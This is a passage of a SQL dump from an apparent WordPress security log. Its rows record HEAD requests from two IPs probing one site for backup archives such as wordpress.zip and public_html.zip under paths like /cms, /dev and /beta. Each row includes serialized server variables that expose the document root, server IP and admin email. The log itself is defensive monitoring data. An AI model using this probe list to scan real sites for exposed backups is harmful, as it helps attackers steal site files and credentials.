Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/cms/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/cms/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXiQAAAUQ\";s:12:\"REDIRECT_URL\";s:18:\"/cms/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52678\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/cms/wordpress.zip\";s:10:\"SCRIPT_URL\";s:18:\"/cms/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXiQAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606775.9427\";s:12:\"REQUEST_TIME\";s:10:\"1569606775\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:58',35124920,36927880,'http://bintara.com.my/cms/wordpress.zip',1,0,'198.71.240.27'),(27192,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/test/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/test/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/test/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXiAAAAUk\";s:12:\"REDIRECT_URL\";s:19:\"/test/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52690\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/test/wordpress.zip\";s:10:\"SCRIPT_URL\";s:19:\"/test/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXiAAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606776.0407\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:57',35124544,36928888,'http://bintara.com.my/test/wordpress.zip',1,0,'198.71.240.27'),(27193,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/v1/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/v1/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/v1/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9UAAAAAM\";s:12:\"REDIRECT_URL\";s:17:\"/v1/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52702\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/v1/wordpress.zip\";s:10:\"SCRIPT_URL\";s:17:\"/v1/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9UAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569606775.839\";s:12:\"REQUEST_TIME\";s:10:\"1569606775\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:58',35124504,36926224,'http://bintara.com.my/v1/wordpress.zip',1,0,'198.71.240.27'),(27194,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/website/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/website/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/website/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9SgAAAAw\";s:12:\"REDIRECT_URL\";s:22:\"/website/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52620\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/website/wordpress.zip\";s:10:\"SCRIPT_URL\";s:22:\"/website/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9SgAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606775.9315\";s:12:\"REQUEST_TIME\";s:10:\"1569606775\";}}','notice','2019-09-27 17:53:38','2019-09-27 17:52:58',35127424,36936912,'http://bintara.com.my/website/wordpress.zip',1,0,'198.71.240.27'),(27195,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/new/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/new/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/new/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXhwAAAU8\";s:12:\"REDIRECT_URL\";s:18:\"/new/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52612\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/new/wordpress.zip\";s:10:\"SCRIPT_URL\";s:18:\"/new/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXhwAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606776.2379\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:38','2019-09-27 17:52:59',35127304,36924272,'http://bintara.com.my/new/wordpress.zip',1,0,'198.71.240.27'),(27196,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/store/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/store/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/store/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXigAAAUM\";s:12:\"REDIRECT_URL\";s:20:\"/store/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52706\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/store/wordpress.zip\";s:10:\"SCRIPT_URL\";s:20:\"/store/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXigAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606776.0314\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:38','2019-09-27 17:52:58',35122696,36914096,'http://bintara.com.my/store/wordpress.zip',1,0,'198.71.240.27'),(27197,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/dev/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/dev/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/dev/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9TgAAAAc\";s:12:\"REDIRECT_URL\";s:18:\"/dev/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52596\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/dev/wordpress.zip\";s:10:\"SCRIPT_URL\";s:18:\"/dev/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9TgAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606775.8788\";s:12:\"REQUEST_TIME\";s:10:\"1569606775\";}}','notice','2019-09-27 17:53:38','2019-09-27 17:52:58',35125360,36929784,'http://bintara.com.my/dev/wordpress.zip',1,0,'198.71.240.27'),(27198,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/beta/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/beta/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/beta/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXiwAAAUo\";s:12:\"REDIRECT_URL\";s:19:\"/beta/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52614\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/beta/wordpress.zip\";s:10:\"SCRIPT_URL\";s:19:\"/beta/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXiwAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606776.1765\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:38','2019-09-27 17:52:58',35124928,36932008,'http://bintara.com.my/beta/wordpress.zip',1,0,'198.71.240.27'),(27199,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/v2/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/v2/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/v2/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9TwAAAAA\";s:12:\"REDIRECT_URL\";s:17:\"/v2/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52696\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/v2/wordpress.zip\";s:10:\"SCRIPT_URL\";s:17:\"/v2/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9TwAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569606776.366\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:38','2019-09-27 17:52:58',35125520,36932104,'http://bintara.com.my/v2/wordpress.zip',1,0,'198.71.240.27'),(27200,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blogs/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/blogs/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blogs/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mFAAAAQM\";s:12:\"REDIRECT_URL\";s:22:\"/blogs/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50597\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/blogs/public_html.zip\";s:10:\"SCRIPT_URL\";s:22:\"/blogs/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mFAAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.5491\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35516880,37310752,'http://bintara.com.my/blogs/public_html.zip',1,0,'217.78.6.15'),(27201,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/newsite/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 